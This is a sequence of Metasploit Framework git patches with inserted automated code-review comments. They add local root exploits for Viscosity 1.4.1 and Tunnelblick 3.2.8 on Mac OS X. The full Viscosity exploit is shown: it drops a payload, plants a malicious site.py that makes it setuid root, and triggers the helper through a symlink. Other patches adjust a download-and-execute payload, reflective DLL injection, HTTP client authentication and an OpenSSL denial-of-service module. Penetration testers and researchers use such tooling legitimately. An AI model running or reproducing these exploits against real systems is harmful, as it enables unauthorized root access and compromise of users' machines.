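Review bot: The directories from `opts['DatabaseMigrationPaths']` are pushed straight onto the process-wide `ActiveRecord::Migrator.migrations_paths` with no check, while the `elog("Could not access migration path ...")` that the old `DBManager#migrate` emitted for unreadable directories is removed in the same commit. Migration files under these paths are loaded and run as Ruby by the migrator, so a mistyped or unexpected path should at least show up in the log. Inside the block I would log and skip any entry for which `::File.directory?(migrations_path)` is false. The block also names `ActiveRecord` directly, which raises `NameError` if database support failed to load; whether that can happen before this point is not visible here, since the enclosing method starts and ends outside the hunk.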
@@ -166,6 +155,20 @@ class DBManager $KCODE = 'NONE' if RUBY_VERSION =~ /^1\.8\./ end + # Loads Metasploit Data Models and adds its migrations to migrations paths. + # + # @return [void] + def initialize_metasploit_data_models + # Provide access to ActiveRecord models shared w/ commercial versions + require "metasploit_data_models" + + metasploit_data_model_migrations_pathname = MetasploitDataModels.root.join( + 'db', + 'migrate' + ) + ActiveRecord::Migrator.migrations_paths << metasploit_data_model_migrations_pathname.to_s + end + # # Create a new database sink and initialize it # From ecdb884b1326afa6bcb82b8d6074e7e0f32119c7 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Sun, 3 Mar 2013 01:42:17 -0500 Subject: [PATCH 60/87] Make download_exec work with authenticated proxies Adds INTERNET_FLAG_KEEP_CONNECTION to HttpOpenRequest flags to allow download_exec to transparently authenticate to a proxy device through wininet. Fun trivia, Windows 7 systems uses Connection: keep-alive by default. This flag benefits older targets (e.g., Windows XP). --- modules/payloads/singles/windows/download_exec.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index 3d6b096e57..68928dc730 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -46,6 +46,7 @@ module Metasploit3 #;0x80000000 | ; INTERNET_FLAG_RELOAD #;0x04000000 | ; INTERNET_NO_CACHE_WRITE #;0x00800000 | ; INTERNET_FLAG_SECURE + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT #;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID #;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID 
@@ -89,7 +90,7 @@ module Metasploit3 if target_uri =~ /^http:/ proto = "http" port_nr = 80 - dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" + dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" end if target_uri =~ /^ftp:/ From 1cc49f75f52fd9ed7c4e1c11a7ac8c8a5206a596 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Sun, 3 Mar 2013 03:26:43 -0500 Subject: [PATCH 61/87] move flag comment to where it's used. --- modules/payloads/singles/windows/download_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index 68928dc730..d0d68fe3b1 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -46,7 +46,6 @@ module Metasploit3 #;0x80000000 | ; INTERNET_FLAG_RELOAD #;0x04000000 | ; INTERNET_NO_CACHE_WRITE #;0x00800000 | ; INTERNET_FLAG_SECURE - #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT #;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID #;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID @@ -91,6 +90,7 @@ module Metasploit3 proto = "http" port_nr = 80 dwflags_asm = "push (0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags\n" + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION end if target_uri =~ /^ftp:/ From 76180f22fcb5a69e12239278783ab37db5d5143b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 3 Mar 2013 13:23:21 +0100 Subject: [PATCH 62/87] added module for cve-2012-4284 --- .../exploits/osx/local/setuid_viscosity.rb | 122 ++++++++++++++++++ 1 file changed, 122 insertions(+) create mode 100644 modules/exploits/osx/local/setuid_viscosity.rb 
diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb
new file mode 100644
index 0000000000..c068b4c3a1
--- /dev/null
+++ b/modules/exploits/osx/local/setuid_viscosity.rb
@@ -0,0 +1,122 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/linux/priv' +require 'msf/core/exploit/exe' + + +class Metasploit4 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Setuid Viscosity Exploit', + 'Description' => %q{ + This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The + vulnerability exists in the setuid ViscosityHelper, where an insufficient + validation of path names allows execution of arbitrary python code as root. + This module has been tested successfully on Viscosity 1.4.1 over Mac OS X + 10.7.5. + }, + 'References' => + [ + [ 'CVE', '2012-4284' ], + [ 'OSVDB', '84709' ], + [ 'EDB', '20485' ], + [ 'URL', 'http://blog.zx2c4.com/791' ] + ], + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jason A. 
Donenfeld', # Vulnerability discovery and original Exploit + 'juan vazquez' # Metasploit module + ], + 'DisclosureDate' => 'Aug 12 2012', + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell' ], + 'Targets' => + [ + [ 'Viscosity 1.4.1 / Mac OS X x86', { 'Arch' => ARCH_X86 } ], + [ 'Viscosity 1.4.1 / Mac OS X x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0 + })) + register_options([ + # These are not OptPath becuase it's a *remote* path + OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), + OptString.new("Viscosity", [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) + ], self.class) + end + + def check + if not file?(datastore["Viscosity"]) + print_error "ViscosityHelper not found" + return CheckCode::Safe + end + + check = session.shell_command_token("find #{datastore["Viscosity"]} -type f -user root -perm -4000") + + if check =~ /ViscosityHelper/ + return CheckCode::Vulnerable + end + + return CheckCode::Safe + end + + def clean + file_rm(@link) + file_rm(@python_file) + file_rm("#{@python_file}c") + file_rm(@exe_file) + end + + def exploit + + exe_name = rand_text_alpha(8) + @exe_file = "#{datastore["WritableDir"]}/#{exe_name}" + print_status("Dropping executable #{@exe_file}") + write_file(@exe_file, generate_payload_exe) + + evil_python = %Q{ +import os +os.setuid(0) +os.setgid(0) +os.system("chown root #{@exe_file}") +os.system("chmod 6777 #{@exe_file}") +os.execl("#{@exe_file}", "#{exe_name}") + } + @python_file = "#{datastore["WritableDir"]}/site.py" + print_status("Dropping python #{@python_file}...") + write_file(@python_file, evil_python) + + print_status("Creating symlink...") + link_name = rand_text_alpha(8) + @link = "#{datastore["WritableDir"]}/#{link_name}" + cmd_exec "ln -s -f -v #{datastore["Viscosity"]} #{@link}" + + 
print_status("Running...") + begin + cmd_exec "#{@link}" + rescue + print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...") + clean + return + end + print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}") + end +end + From 81e2dbc71e5d69128e108c73cf0de2e2a70c281b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 3 Mar 2013 19:48:12 +0100 Subject: [PATCH 63/87] added module for CVE-2012-3485 --- .../exploits/osx/local/setuid_tunnelblick.rb | 121 ++++++++++++++++++ 1 file changed, 121 insertions(+) create mode 100644 modules/exploits/osx/local/setuid_tunnelblick.rb diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb new file mode 100644 index 0000000000..66db2db4d9 --- /dev/null +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb 
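Review bot: `check` returns `CheckCode::Vulnerable` on nothing more than the helper existing as a setuid-root file, but the module description ties the flaw to Viscosity 1.4.1, so any other release that still installs a setuid `ViscosityHelper` would be reported as vulnerable without the version having been looked at. In an assessment report that reads as a confirmed finding when only file ownership and the setuid bit were tested. Unless the installed version is actually compared, `return CheckCode::Appears` states what was verified, and a one-line comment above the `find` call saying so would help the next reader. The same applies to `check` in setuid_tunnelblick.rb, added by the next patch in this series.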
@@ -0,0 +1,121 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/exploit/exe' + +class Metasploit4 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Setuid Tunnelblick Exploit', + 'Description' => %q{ + This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The + vulnerability exists in the setuid openvpnstart, where an insufficient + validation of path names allows execution of arbitrary shell scripts as root. + This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 + over Mac OS X 10.7.5. + }, + 'References' => + [ + [ 'CVE', '2012-3485' ], + [ 'EDB', '20443' ], + [ 'URL', 'http://blog.zx2c4.com/791' ] + ], + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jason A. 
Donenfeld', # Vulnerability discovery and original Exploit + 'juan vazquez' # Metasploit module + ], + 'DisclosureDate' => 'Aug 11 2012', + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell' ], + 'Targets' => + [ + [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ], + [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0 + })) + register_options([ + # These are not OptPath becuase it's a *remote* path + OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), + OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ]) + ], self.class) + end + + def check + if not file?(datastore["Tunnelblick"]) + print_error "openvpnstart not found" + return CheckCode::Safe + end + + check = session.shell_command_token("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000") + + if check =~ /openvpnstart/ + return CheckCode::Vulnerable + end + + return CheckCode::Safe + end + + def clean + file_rm(@link) + cmd_exec("rm -rf #{datastore["WritableDir"]}/openvpn") + end + + def exploit + + print_status("Creating directory...") + cmd_exec "mkdir -p #{datastore["WritableDir"]}/openvpn/openvpn-0" + + exe_name = rand_text_alpha(8) + @exe_file = "#{datastore["WritableDir"]}/openvpn/openvpn-0/#{exe_name}" + print_status("Dropping executable #{@exe_file}") + write_file(@exe_file, generate_payload_exe) + cmd_exec "chmod +x #{@exe_file}" + + + evil_sh =< Date: Sun, 3 Mar 2013 19:52:31 +0100 Subject: [PATCH 64/87] fixed EOF --- modules/exploits/osx/local/setuid_tunnelblick.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index 66db2db4d9..e12441c14b 100644 
--- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -91,11 +91,10 @@ class Metasploit4 < Msf::Exploit::Local cmd_exec "chmod +x #{@exe_file}" - evil_sh =< Date: Sun, 3 Mar 2013 19:54:17 +0100 Subject: [PATCH 65/87] minor fixes --- modules/exploits/osx/local/setuid_viscosity.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index c068b4c3a1..4c674f2f07 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -9,10 +9,8 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' -require 'msf/core/post/linux/priv' require 'msf/core/exploit/exe' - class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking @@ -58,7 +56,7 @@ class Metasploit4 < Msf::Exploit::Local register_options([ # These are not OptPath becuase it's a *remote* path OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), - OptString.new("Viscosity", [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) + OptString.new("Viscosity", [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) ], self.class) end @@ -91,14 +89,15 @@ class Metasploit4 < Msf::Exploit::Local print_status("Dropping executable #{@exe_file}") write_file(@exe_file, generate_payload_exe) - evil_python = %Q{ + evil_python =<<-EOF import os os.setuid(0) os.setgid(0) os.system("chown root #{@exe_file}") os.system("chmod 6777 #{@exe_file}") os.execl("#{@exe_file}", "#{exe_name}") - } + EOF + @python_file = "#{datastore["WritableDir"]}/site.py" print_status("Dropping python #{@python_file}...") write_file(@python_file, evil_python) From 6d811ce4b92dc45620c1bdcceca79eee0162c2e4 Mon Sep 17 00:00:00 2001 
From: David Maloney Date: Mon, 4 Mar 2013 09:09:11 -0600 Subject: [PATCH 66/87] empty passwords should be allowed --- lib/rex/proto/http/client.rb | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 4a8d8108f3..3461a0067e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -262,15 +262,9 @@ class Client if opts['username'].nil? or opts['username'] == '' if self.username and not (self.username == '') opts['username'] = self.username - else - opts['username'] = nil - end - end - - if opts['password'].nil? or opts['password'] == '' - if self.password and not (self.password == '') opts['password'] = self.password else + opts['username'] = nil opts['password'] = nil end end From 92ee4300dfe8616ff711a18796be8817c48f96a4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 4 Mar 2013 17:40:09 +0100 Subject: [PATCH 67/87] cleanup for reflective_dll_inject --- .../windows/manage/reflective_dll_inject.rb | 29 ++++++++++--------- 1 file changed, 16 insertions(+), 13 deletions(-) diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index ac7d447afe..7f9a39ab2e 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb 
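Review bot: An empty-string `opts['username']` is still treated as "not supplied" after this change, and in that branch `opts['password']` is now overwritten unconditionally, so a password passed by the caller is dropped whenever the username is empty or missing. That may be intended, since the credentials are now handled as a pair, but nothing in the code says so. I would add a comment above the condition such as `# Username and password are taken as a pair: with no username, both come from the client (or both are nil)`. The `or` / `and not` operators on the context lines would be less precedence-prone as `||` / `&& !`. The enclosing method begins and ends outside this hunk.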
@@ -12,15 +12,18 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Reflective DLL Injection Module', - 'Description' => %q{ + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ This module will inject into the memory of a process a specified Reflective DLL. }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => + [ + [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] + ] )) register_options( @@ -49,7 +52,7 @@ class Metasploit3 < Msf::Post end end - raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + raise "Can't find an exported ReflectiveLoader function!" if offset.nil? or offset == 0 rescue print_error( "Failed to read and parse Dll file: #{$!}" ) return @@ -60,7 +63,7 @@ class Metasploit3 < Msf::Post def inject_into_pid(pay, pid, offset) - if offset.nil? + if offset.nil? or offset == 0 print_error("Reflective Loader offset is nil.") return end 
@@ -79,19 +82,19 @@ class Metasploit3 < Msf::Post begin print_status("Opening process #{pid}") host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) - print_status("Generating payload") print_status("Allocating memory in procees #{pid}") mem = host_process.memory.allocate(pay.length + (pay.length % 1024)) # Ensure memory is set for execution host_process.memory.protect(mem) - print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") - print_status("Writing the stager into memory...") + vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") + print_status("Writing the payload into memory") host_process.memory.write(mem, pay) + print_status("Executing payload") host_process.thread.create(mem+offset, 0) print_good("Successfully injected payload in to process: #{pid}") rescue ::Exception => e print_error("Failed to Inject Payload to #{pid}!") - print_error(e.to_s) + vprint_error(e.to_s) end end end From 12247d47ba78d91552d48e523dec714fa805b139 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 4 Mar 2013 10:46:05 -0600 Subject: [PATCH 68/87] Rename module, sorry, no pull request. --- modules/exploits/osx/local/setuid_viscosity.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index 4c674f2f07..c70127857e 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, { - 'Name' => 'Setuid Viscosity Exploit', + 'Name' => 'Viscosity setuid-set ViscosityHelper Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient From 7fa24d9060bd83487d19089555a14aff127e7cca Mon Sep 17 00:00:00 2001 
From: sinn3r Date: Mon, 4 Mar 2013 10:54:33 -0600 Subject: [PATCH 69/87] Module rename --- modules/exploits/osx/local/setuid_tunnelblick.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index e12441c14b..691e167901 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, { - 'Name' => 'Setuid Tunnelblick Exploit', + 'Name' => 'Setuid Tunnelblick Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient From 6dcca7df78c6c1e2f589ed33cedbda652f14710e Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 11:24:26 -0600 Subject: [PATCH 70/87] Remove duplicated header issues Headers were getting duped back into client config, causing invalid requests to be sent out --- lib/msf/core/exploit/http/client.rb | 15 +++++---------- lib/rex/proto/http/client.rb | 1 + lib/rex/proto/http/client_request.rb | 7 ++++--- modules/auxiliary/scanner/http/http_login.rb | 7 ++++++- 4 files changed, 16 insertions(+), 14 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6769a44b9a..a156bc4e3a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -145,6 +145,9 @@ module Exploit::Remote::HttpClient dossl = ssl end + client_username = opts['username'] || datastore['USERNAME'] || '' + client_password = opts['password'] || datastore['PASSWORD'] || '' + nclient = Rex::Proto::Http::Client.new( rhost, rport.to_i, 
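Review bot: `client_username = opts['username'] || datastore['USERNAME'] || ''` falls through only on `nil`, so an explicit `''` in `opts` suppresses the datastore credentials, and this becomes the only place credentials are chosen, because the per-request assignment in `send_request_raw` and `send_request_cgi` is deleted by later hunks of this commit. http_login, changed in the same commit to pass `'username' => ''` and `'password' => ''`, apparently relies on this to send a request without credentials, yet the contract is not written down anywhere visible. A comment above the two new lines would make it explicit: `# opts wins over the datastore; pass '' to connect without credentials`. The enclosing method (presumably `connect`) starts before the hunk and continues after it.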
@@ -155,8 +158,8 @@ module Exploit::Remote::HttpClient dossl, ssl_version, proxies, - datastore['USERNAME'], - datastore['PASSWORD'] + client_username, + client_password ) # Configure the HTTP client with the supplied parameter @@ -258,10 +261,6 @@ module Exploit::Remote::HttpClient def send_request_raw(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_raw(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -277,10 +276,6 @@ module Exploit::Remote::HttpClient def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 3461a0067e..f360701556 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -158,6 +158,7 @@ class Client opts['port'] = self.port req = ClientRequest.new(opts) + req end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index e0cdb4946f..76a4294af1 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -21,7 +21,7 @@ class ClientRequest 'cgi' => true, 'cookie' => nil, 'data' => '', - 'headers' => {}, + 'headers' => nil, 'raw_headers' => '', 'method' => 'GET', 'path_info' => '', @@ -87,6 +87,7 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) + @opts['headers'] ||= {} end def to_s 
@@ -165,13 +166,13 @@ class ClientRequest # If an explicit User-Agent header is set, then use that instead of # the default - unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') + unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end # Similar to user-agent, only add an automatic auth header if a # manual one hasn't been provided - unless opts['headers'].keys.map{|x| x.downcase }.include?('authorization') + unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('authorization') req << set_auth_header end diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 40446f68db..0452e583e6 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -66,6 +66,8 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => path, 'method' => datastore['REQUESTTYPE'], + 'username' => '', + 'password' => '' }, 10) next if not res @@ -75,6 +77,8 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => path, 'method' => datastore['REQUESTTYPE'], + 'username' => '', + 'password' => '' }, 10) next if not res end @@ -94,7 +98,8 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - + load "lib/rex/proto/http/client_request.rb" + if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "") print_error("You need need to set AUTH_URI when using PUT Method !") return From 71ba044d03299fc939b2ccf861cb900d830986ed Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 11:25:34 -0600 Subject: [PATCH 71/87] remove debugging aid --- modules/auxiliary/scanner/http/http_login.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 0452e583e6..13a8f2a733 100644 --- a/modules/auxiliary/scanner/http/http_login.rb 
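Review bot: The two guards in the `@@ -165,13 +166,13 @@` hunk of client_request.rb repeat the same downcased key scan and join the nil check with `and`, whose low precedence is easy to misread after `unless`. Computing the names once, `header_names = (opts['headers'] || {}).keys.map { |k| k.downcase }`, lets both checks read `unless header_names.include?('user-agent')` and `unless header_names.include?('authorization')`. If `opts` here returns `@opts` (not visible in the hunk), the nil guard is already covered by the `@opts['headers'] ||= {}` added to `initialize` in this commit. The enclosing method starts and ends outside the hunk.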
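Review bot: The empty `'username' => ''` and `'password' => ''` pairs added in the `@@ -66,6 +66,8 @@` and `@@ -75,6 +77,8 @@` hunks of http_login.rb carry no comment saying why they are there. Going by the `connect` change in the same commit, an empty string wins over `datastore['USERNAME']`, so these two requests presumably go out without the configured credentials. A line such as `# empty creds: keep datastore USERNAME/PASSWORD off this unauthenticated probe` above each call would record that for the next maintainer. The surrounding method continues outside both hunks.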
+++ b/modules/auxiliary/scanner/http/http_login.rb @@ -98,8 +98,6 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - load "lib/rex/proto/http/client_request.rb" - if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "") print_error("You need need to set AUTH_URI when using PUT Method !") return From cb18b81503b4f23b465020ed63b1676599d09c1c Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 4 Mar 2013 11:59:30 -0600 Subject: [PATCH 72/87] Add spec to ensure auth is sane --- spec/lib/rex/proto/http/client_spec.rb | 49 ++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 3ddd07d6bd..77ca6c4758 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb 
@@ -87,6 +87,55 @@ describe Rex::Proto::Http::Client do end end + context "with credentials" do + subject(:cli) do + cli = Rex::Proto::Http::Client.new(ip) + cli + end + let(:first_response) { + "HTTP/1.1 401 Unauthorized\r\nContent-Length: 0\r\nWWW-Authenticate: Basic realm=\"foo\"\r\n\r\n" + } + let(:authed_response) { + "HTTP/1.1 200 Ok\r\nContent-Length: 0\r\n\r\n" + } + let(:user) { "user" } + let(:pass) { "pass" } + + it "should not send creds on the first request in order to induce a 401" do + req = cli.request_cgi + req.to_s.should_not match("Authorization:") + end + + it "should send creds after receiving a 401" do + conn = mock + conn.stub(:put) + conn.stub(:shutdown) + conn.stub(:close) + + conn.should_receive(:get_once).and_return(first_response, authed_response) + conn.should_receive(:put) do |str_request| + str_request.should_not include("Authorization") + nil + end + conn.should_receive(:put) do |str_request| + str_request.should include("Authorization") + nil + end + + cli.should_receive(:_send_recv).twice.and_call_original + + Rex::Socket::Tcp.stub(:create).and_return(conn) + + opts = { "username" => user, "password" => pass} + req = cli.request_cgi(opts) + cli.send_recv(req) + + # Make sure it didn't modify the argument + opts.should == { "username" => user, "password" => pass} + end + + end + it "should attempt to connect to a server" do this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) expect { this_cli.connect(1) }.to raise_error ::Rex::ConnectionRefused From 867875b4454d3df903eb6d55405f273827f249eb Mon Sep 17 00:00:00 2001 
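Review bot: The first example in the `with credentials` context calls `cli.request_cgi` with no options on a client built as `Rex::Proto::Http::Client.new(ip)`, so no username or password is in play and `should_not match("Authorization:")` would hold even if credentials were sent eagerly. Building the request the way the second example does, `req = cli.request_cgi("username" => user, "password" => pass)`, would make the example pin the behaviour its name states. In the second example the two `conn.should_receive(:put)` blocks are not marked `.ordered`, so the without-then-with sequence is probably not enforced; that is worth confirming against the rspec-mocks version in use.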
From: Wolfgang Ettlinger Date: Mon, 4 Mar 2013 19:09:50 +0100 Subject: [PATCH 73/87] Beautified OpenSSL-AESNI module Modifed the CVE-2012-2686 module to follow suggestions by @jvazquez-r7: * Added description for all fields in the SSL packets * MAX_TRIES now required * use get_once instead of timeout --- modules/auxiliary/dos/ssl/openssl_aesni.rb | 166 ++++++++++++--------- 1 file changed, 98 insertions(+), 68 deletions(-) diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb index d05134f4de..94ba11e470 100644 --- a/modules/auxiliary/dos/ssl/openssl_aesni.rb +++ b/modules/auxiliary/dos/ssl/openssl_aesni.rb @@ -17,8 +17,8 @@ class Metasploit4 < Msf::Auxiliary 'Author' => [ 'Wolfgang Ettlinger ' ], - 'License' => BSD_LICENSE, - 'References' => + 'License' => BSD_LICENSE, + 'References' => [ [ 'CVE', '2012-2686'], [ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt'] 
